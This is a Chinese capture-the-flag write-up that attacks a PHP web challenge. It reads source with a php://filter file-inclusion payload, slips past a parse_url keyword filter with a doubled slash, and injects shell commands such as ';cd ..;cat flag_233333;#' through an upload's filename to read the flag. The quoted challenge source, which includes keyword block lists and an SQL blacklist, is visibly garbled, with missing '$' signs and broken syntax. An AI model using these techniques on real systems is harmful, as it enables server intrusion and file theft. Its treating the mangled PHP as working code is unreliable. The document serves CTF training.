打开题目
只有个登录框,其他什么都没有,尝试了一下弱口令,没能成功
尝试访问一下register.php,看看能不能注册个账号
注册页面,随便注册个账号登陆一下
url中感觉是个注入点,尝试使用file伪协议读取一下user.php的源码
php://filter/convert.base64-encode/resource=user
解码得到源码
<?php
require_once("function.php");
if( !isset( $_SESSION['user'] )){
Header("Location: index.php");
}
if($_SESSION['isadmin'] === '1'){
$oper_you_can_do = $OPERATE_admin;
}else{
$oper_you_can_do = $OPERATE;
}
//die($_SESSION['isadmin']);
if($_SESSION['isadmin'] === '1'){
if(!isset($_GET['page']) || $_GET['page'] === ''){
$page = 'info';
}else {
$page = $_GET['page'];
}
}
else{
if(!isset($_GET['page'])|| $_GET['page'] === ''){
$page = 'guest';
}else {
$page = $_GET['page'];
if($page === 'info')
{
// echo("<script>alert('no premission to visit info, only admin can, you are guest')</script>");
Header("Location: user.php?page=guest");
}
}
}
filter_directory();
//if(!in_array(page,oper_you_can_do)){
// $page = 'info';
//}
include "$page.php";
?>
没有什么有用的信息,目录扫描还扫到一个function.php,读取一下源码
<?php
session_start();
require_once "config.php";
function Hacker()
{
Header("Location: hacker.php");
die();
}
function filter_directory()
{
$keywords = ["flag","manage","ffffllllaaaaggg"];
uri = parse_url(_SERVER["REQUEST_URI"]);
parse_str($uri['query'], $query);
// var_dump($query);
// die();
foreach($keywords as $token)
{
foreach($query as $k => $v)
{
if (stristr($k, $token))
hacker();
if (stristr($v, $token))
hacker();
}
}
}
function filter_directory_guest()
{
$keywords = ["flag","manage","ffffllllaaaaggg","info"];
uri = parse_url(_SERVER["REQUEST_URI"]);
parse_str($uri['query'], $query);
// var_dump($query);
// die();
foreach($keywords as $token)
{
foreach($query as $k => $v)
{
if (stristr($k, $token))
hacker();
if (stristr($v, $token))
hacker();
}
}
}
function Filter($string)
{
global $mysqli;
$blacklist = "information|benchmark|order|limit|join|file|into|execute|column|extractvalue|floor|update|insert|delete|username|password";
$whitelist = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'(),_*`-@=+><";
for ($i = 0; i \< strlen(string); $i++) {
if (strpos("$whitelist", string\[i]) === false) {
Hacker();
}
}
if (preg_match("/$blacklist/is", $string)) {
Hacker();
}
if (is_string($string)) {
return mysqli-\>real_escape_string(string);
} else {
return "";
}
}
function sql_query($sql_query)
{
global $mysqli;
$res = mysqli-\>query(sql_query);
return $res;
}
function login($user, $pass)
{
user = Filter(user);
pass = md5(pass);
sql = "select \* from \`albert_users\` where \`username_which_you_do_not_know\`= 'user' and `password_which_you_do_not_know_too` = '$pass'";
echo $sql;
res = sql_query(sql);
// var_dump($res);
// die();
if ($res->num_rows) {
$data = $res->fetch_array();
$_SESSION['user'] = $data[username_which_you_do_not_know];
$_SESSION['login'] = 1;
$_SESSION['isadmin'] = $data[isadmin_which_you_do_not_know_too_too];
return true;
} else {
return false;
}
return;
}
function updateadmin(level,user)
{
sql = "update \`albert_users\` set \`isadmin_which_you_do_not_know_too_too\` = 'level' where `username_which_you_do_not_know`='$user' ";
echo $sql;
res = sql_query(sql);
// var_dump($res);
// die();
// die($res);
if ($res == 1) {
return true;
} else {
return false;
}
return;
}
function register($user, $pass)
{
global $mysqli;
user = Filter(user);
pass = md5(pass);
sql = "insert into \`albert_users\`(\`username_which_you_do_not_know\`,\`password_which_you_do_not_know_too\`,\`isadmin_which_you_do_not_know_too_too\`) VALUES ('user','$pass','0')";
res = sql_query(sql);
return $mysqli->insert_id;
}
function logout()
{
session_destroy();
Header("Location: index.php");
}
?>
发现有一个ffffllllaaaaggg
访问一下
被拦截了
参考:parse_url函数的解释和绕过_parseurl-CSDN博客
在这段代码中parse_url函数,如果访问的路径不对,可以绕过这个函数的判断,返回想要的结果
所以我们需要把访问路径写错,在user.php前多加个/
<?php
if (FLAG_SIG != 1){
die("you can not visit it directly");
}else {
echo "you can find sth in m4aaannngggeee";
}
?>
解码得到源码,读取m4aaannngggeee
解码得到
<?php
if (FLAG_SIG != 1){
die("you can not visit it directly");
}
include "templates/upload.html";
?>
访问templates/upload.html
有个能上传文件的地方,随便上传个文件
发现是假的,读取upllloadddd.php
解码得到源码
<?php
$allowtype = array("gif","png","jpg");
$size = 10000000;
$path = "./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/";
$filename = $_FILES['file']['name'];
if(is_uploaded_file($_FILES['file']['tmp_name'])){
if(!move_uploaded_file(_FILES\['file'\]\['tmp_name'\],path.$filename)){
die("error:can not move");
}
}else{
die("error:not an upload file!");
}
$newfile = path.filename;
echo "file upload success<br />";
echo $filename;
picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".filename." | base64 -w 0");
echo "<img src='data:image/png;base64,".$picdata."'></img>";
if($_FILES['file']['error']>0){
unlink($newfile);
die("Upload file error: ");
}
ext = array_pop(explode(".",_FILES['file']['name']));
if(!in_array(ext,allowtype)){
unlink($newfile);
}
?>
没有任何过滤的文件格式,
这里使用了 system 函数来执行一个系统命令。具体来说,它首先通过 cat 命令读取位于 ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/ 目录下的指定文件(由 $filename 指定)的内容,可以利用文件名代码执行
现在需要找到正确的文件上传的上传点
兜兜转转访问了好久,发现上传点的地址在m4aaannngggeee,访问一下
随便上传一个文件,抓一下包,更改filename地方的参数为我们想执行的命令
使用;结束上一个命令,使用#注释后面的命令,使结果回显为想要查看的内容
使用ls查看一下paload:;ls;#
查看一下/目录
paload:;ls /;#
什么都没有,可能给 / 过滤了,换一种方法,查看上一级目录
paload:;ls ..;#
发现一个flag_233333,查看一下
paload:;cd ..;cat flag_233333;#
得到flag:flag{dbd1e8ae-a7e4-4875-9c57-1aeeb0b86c56}